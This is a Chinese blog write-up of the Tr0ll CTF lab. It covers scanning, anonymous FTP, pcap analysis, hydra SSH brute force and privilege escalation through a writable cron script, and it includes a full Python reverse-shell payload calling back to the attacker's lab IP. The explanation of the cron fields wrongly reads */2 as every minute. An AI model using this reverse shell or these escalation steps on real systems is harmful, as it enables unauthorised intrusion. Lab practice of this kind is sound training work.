freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Tr0ll靶场复现
2024-04-10 16:53:59

一、环境搭建

Kali攻击机IP地址:192.168.247.145

靶机IP地址:暂时未知

二、信息收集

1、Nmap获取靶机地址
image-20240410092158767.png

靶机地址为192.168.247.147


2、Nmap进行端口探测
image-20240410092337207.png

靶机开放了21、22、80端口,且允许默认账号Anonymous/Anonymous登录


3、目录扫描
image-20240410093033440.png

发现robots.txt中存在secret目录
  • 尝试访问web页面
    image-20240410094840433.png

未发现可利用的信息


4、指纹识别
image-20240410093129267.png

三、漏洞探测

尝试登陆ftp
image-20240410095417638.png


分析该流量包
image-20240410095550664.png

全局搜索字符串是否存在txt文件,发现secret_stuff.txt


不断点击find,发现secret_stuff.txt文件的ftp data
image-20240410100420498.png

该文件提示找到了sup3rs3cr3tdirlol


一开始还以为是哪个用户的密码,经过尝试发现是一个目录

image-20240410100659673.png

下载该文件并分析
image-20240410101031600.png

strings查找该文件的可打印字符串,提示找到地址0x0856BF


经过尝试发现也是一个目录
image-20240410101325770.png

打开第一个文件夹
image-20240410101413022.png

存在一堆字符,感觉是用户名


打开第二个文件夹
image-20240410101551684.png

发现Pass.txt,难不成这个就是密码?!


将第一个文件做成用户名字典,第二个文件做成密码,尝试爆破ssh
image-20240410102404382.png


emmm...失败了,通过查阅资料发现,是将文件名当作密码
image-20240410102515981.png

通过参数-p指定密码为Pass.txt,获得ssh的账号密码为overflow/Pass.txt

四、权限提升

登陆ssh
image-20240410102817877.png


查看系统信息
image-20240410102916415.png


搜索本地提权漏洞
image-20240410104810207.png


将文件复制到当前桌面目录
image-20240410105901000.png


利用python启用http简易服务传输文件

image-20240410110417124.png
image-20240410110358710.png


查看flag文件
image-20240410110447690.png

五、拓展与总结

登陆ssh后发现几分钟后shell就会断开,应该是配置了计划任务,查看计划任务
image-20240410143829383.png

*/2 * * * * cleaner.py
*/2:分钟字段,表示每分钟都执行一次。* 表示每分钟,/2 表示每个值(在这里是分钟)都执行一次。
*:小时字段,表示每小时都执行一次。* 表示每个小时。
*:日期字段,表示每天都执行一次。* 表示每个日期。
*:月份字段,表示每个月都执行一次。* 表示每个月。
*:星期字段,表示每周都执行一次。* 表示每个星期。
总结为分、时、日、月、周

脚本的作用是删除/tmp目录下的所有文件并退出程序


查看该文件的权限信息
image-20240410144301763.png


1、反弹shell(此处靶机修改了一下环境,ip变为192.168.247.148)

#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.247.145'
	port=9999
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()

image-20240410145850717.png

image-20240410145916304.png


2、新增root可执行程序
image-20240410150827225.png

执行程序
image-20240410151030380.png


3、为overflow用户添加sudo权限
image-20240410152234740.png

image-20240410152241902.png

此次打靶涉及的知识点有常规的信息收集(端口、目录、指纹)、ftp匿名登录、流量分析、文件分析、hydra爆破以及多种提权方式等。

# 漏洞 # 渗透测试
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录